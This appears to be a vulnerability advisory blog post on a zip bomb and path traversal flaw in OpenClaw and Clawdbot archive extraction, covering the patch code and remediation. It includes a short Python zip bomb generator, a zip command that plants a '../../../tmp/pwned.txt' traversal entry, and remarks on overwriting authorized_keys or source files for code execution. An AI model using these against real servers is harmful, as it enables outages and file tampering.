Feb 18, 2026·7 min read·3 visits
OpenClaw versions <= 2026.2.13 allow unauthenticated users (in some configurations) or low-privileged users to upload malicious archives. These archives can either be 'Zip Bombs' that crash the server by exhausting disk/memory, or contain path traversal payloads (`../../`) to overwrite sensitive system files. The fix enforces strict resource budgets and path sanitization.
A classic case of 'trusting the input' leads to Denial of Service and potential file overwrite in the OpenClaw and Clawdbot ecosystem. By failing to validate archive contents before extraction, the application becomes susceptible to 'Zip Bombs'—tiny files that expand into petabytes of garbage—and directory traversal attacks that can escape the sandbox.
There is a certain romance to the ZIP file. It’s the digital equivalent of a moving box—you pack things in, tape it up, and ship it off. But in the world of software development, opening that box is an act of extreme trust. You are effectively telling your computer, 'Take whatever is inside here and manifest it onto my hard drive.'
In the case of OpenClaw and its robotic cousin Clawdbot, this trust was misplaced. These tools are designed for automation, often handling user-supplied data or fetching packages from remote sources. To do their job, they need to extract archives. It sounds simple enough: read stream, decompress stream, write file.
However, the developers forgot one crucial rule of survival in the hostile internet: Compression is a lie. A 42-kilobyte file can mathematically represent petabytes of zeros. If your code blindly follows the instructions inside a ZIP header, it will try to allocate that memory or write those bytes until the host system screams and dies. This vulnerability, GHSA-h89v-j3x9-8wqj, is a textbook example of what happens when you let an unchecked algorithm run wild with system resources.
This vulnerability is actually a 'buy one, get one free' deal. It combines two classic weakness classes: CWE-409 (Improper Handling of Highly Compressed Data) and CWE-22 (Path Traversal).
The first issue is the lack of resource accounting. The extract logic in src/infra/archive.ts operated on a loop: get entry, write entry. It didn't care if the entry was 1MB or 100GB. It didn't care if the archive claimed to contain 10 million files. In the world of Node.js, where streams are often piped directly to the filesystem, this is catastrophic. An attacker can construct a recursive archive (like the infamous 42.zip) or a 'flat' bomb (a single massive text file of repeated characters). The application will dutifully try to process it, consuming all available inodes, disk space, or RAM, leading to a hard crash.
The second issue is arguably more dangerous for integrity. The extractor blindly trusted the filenames within the archive. If a file inside the ZIP was named ../../../../etc/passwd, the extractor would resolve that path relative to the extraction root. Since there was no check to ensure the resolved path remained inside the target directory, the application would overwrite files outside its sandbox. This turns a simple file upload into an arbitrary file overwrite primitive.
The remediation for this vulnerability is a masterclass in defensive coding. The maintainers didn't just patch a regex; they architected a budget system. Let's look at the fix in commit d3ee5deb87ee2ad0ab83c92c365611165423cb71.
Previously, the code likely looked something like this (pseudocode):
// The "YOLO" approach
stream.pipe(unzip).on('entry', (entry) => {
entry.pipe(fs.createWriteStream(entry.path));
});The fix introduces a ArchiveExtractLimits interface and a createExtractBudgetTransform stream. This acts as a toll booth for bytes. Every byte extracted must be accounted for.
// src/infra/archive.ts (Post-fix)
const limits = {
maxArchiveBytes: 256 * 1024 * 1024, // 256MB compressed
maxExtractedBytes: 512 * 1024 * 1024, // 512MB unpacked
maxEntries: 50000,
};
// Checking the compressed size first
if (stats.size > limits.maxArchiveBytes) {
throw new Error(`Archive size ${stats.size} exceeds limit`);
}
// The Budget Transform
let extractedBytes = 0;
const budgetStream = new Transform({
transform(chunk, encoding, callback) {
extractedBytes += chunk.length;
if (extractedBytes > limits.maxExtractedBytes) {
return callback(new Error('Extraction budget exceeded'));
}
this.push(chunk);
callback();
}
});They also implemented strict path validation for node-tar hooks:
// Preventing traversal
if (entry.path.includes('..') || path.isAbsolute(entry.path)) {
// Deny entry
}This code creates a 'budget' for the extraction process. If the archive tries to withdraw more bytes than allowed, the transaction is cancelled, and the stream is destroyed.
Exploiting this is trivially easy and requires no advanced reverse engineering—just a basic understanding of how compression works. Here is how a researcher (or attacker) would demonstrate the impact.
We don't need a complex fuzzer. We can use Python to generate a 'flat' zip bomb that is small on disk but huge in memory.
# generate_bomb.py
z = zipfile.ZipFile('bomb.zip', mode='w', compression=zipfile.ZIP_DEFLATED)
# Create a file with 1GB of zeros
data = '0' * (1024 * 1024 * 1024)
z.writestr('big_file.txt', data)
z.close()This script creates a ZIP file that is only a few kilobytes (because a billion zeros compress very well) but expands to 1GB. To go for a full DoS, we would repeat this loop 10 times to demand 10GB of disk space.
To test the traversal, we simply name an entry maliciously.
touch malicious.txt
zip malicious.zip ../../../tmp/pwned.txtThe attacker locates an upload endpoint in OpenClaw or Clawdbot that accepts archives (e.g., a plugin upload, a backup restore, or a dataset import). Upon uploading bomb.zip, the server will hang as it attempts to write 10GB of data. If the server is running on a container with limited storage, the ENOSPC (No space left on device) error will crash the application and potentially other services on the same node.
While Denial of Service (DoS) is often dismissed as 'just downtime,' in the context of automation tools like OpenClaw, it can be devastating. OpenClaw is designed to run workflows. If the controller is taken offline by a disk-fill attack, all downstream automations fail. This could mean backups aren't taken, orders aren't processed, or monitoring alerts aren't fired.
Furthermore, the Path Traversal aspect elevates the risk significantly. If OpenClaw runs as root (which, let's be honest, many Docker containers still do by default), an attacker could overwrite /usr/bin/node or inject a malicious entry into .ssh/authorized_keys. Even running as a low-privileged user, an attacker could overwrite the application's own source code (e.g., index.js) to achieve persistent Remote Code Execution (RCE) the next time the application restarts.
This isn't just a crash; it's a potential foothold.
The only reliable fix is to update the affected packages. The vulnerability is patched in OpenClaw v2026.2.14. The fix is structural, not just a configuration change, so code updates are mandatory.
npm update openclaw clawdbot immediately.If you are writing code that handles archives, never assume the header tells the truth. Always implement:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H| Product | Affected Versions | Fixed Version |
|---|---|---|
openclaw OpenClaw | <= 2026.2.13 | 2026.2.14 |
clawdbot OpenClaw | <= 2026.1.24-3 | Latest |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-409 (Zip Bomb) / CWE-22 (Path Traversal) |
| CVSS Score | 7.5 (High) |
| Attack Vector | Network (via File Upload) |
| Impact | Denial of Service & File Overwrite |
| Exploit Status | No public PoC, but trivial to exploit |
| Patch Date | 2026-02-14 |
Improper Handling of Highly Compressed Data (Data Amplification)